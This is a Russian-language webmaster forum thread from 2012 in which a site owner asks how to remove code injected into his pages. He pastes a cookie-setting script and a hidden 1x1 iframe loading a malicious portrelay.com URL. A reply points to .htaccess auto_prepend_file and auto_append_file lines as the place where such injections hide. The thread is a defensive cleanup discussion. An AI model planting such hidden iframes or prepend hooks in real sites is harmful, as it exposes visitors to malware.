Master-X
Форум | Новости | Статьи
Главная » Форум » CJs » 
Тема: Portrelay com - вирус,малваре? как убрать?
цитата
12/10/12 в 11:58
 Al West
Такая хрень прилипла к нескольким сиджам, не смог найти инфу, как от нее избавиться, может кто подскажет?

Короче, липнет внизу страницы, между кодом стрим-ротатора и самим хтмл файлом вот такая хрень:

<script type="text/javascript">
<!--
var d=new Date();
var ex_d=new Date();
ex_d.setTime(d.getTime()+7*24*60*60);
document.cookie='tmpt=1263424069.4;path=/;expires='+ex_d.toGMTString(ex_d)+';';
// -->
</script>
<iframe src='http://vxgjhc.portrelay.com/vd/20;fd92e1411d639ff2518d34b6ba06b98e' width='1' height='1' frameborder='0' ></iframe>

Откуда берется, не пойму, в самом хтмл файле ее нет, в темплейте стрима тоже, посторонних файлов на серваке не заметил, взлома сервака не нашел, там куча защит по ИП на скриптах стрима и на фтп. На нескольких сиджах она есть, на других нет. Подозреваю что это из-за ифрейма джюси или экзоклика могла прилипнуть. Каспер ругается на вредоносную ссылку, траф падает, Гугль тоже заметно меньше льет.
Может кто сталкивался или знает где копать?
цитата
12/10/12 в 21:12
 sarduor
удаляйте нахуй этот экзоклик. уже замечал не раз на сиджах чужих что при клике даже по вебмастерской линке открывается попап.
говна всякого навешаете, а потом удивляетесь. халявы не бывает.
п.с. извини за прямоту, если чтоicon_smile.gif
цитата
13/10/12 в 00:07
 Evial
Проверь.

.htaccess
php_value auto_prepend_file tmp/some_file
php_value auto_append_file tmp/some_file
цитата
13/10/12 в 17:26
 Al West
Sargas +5 баллов, там сидела зараза, в папке стрима. Причем почему-то на трех доменах только. Как она туда попала, загадка! Хотя возможно только на этих трех доменах и висели ифреймы экзоклика. Странно что больше ни у кого такого нет.


Эта страница в полной версии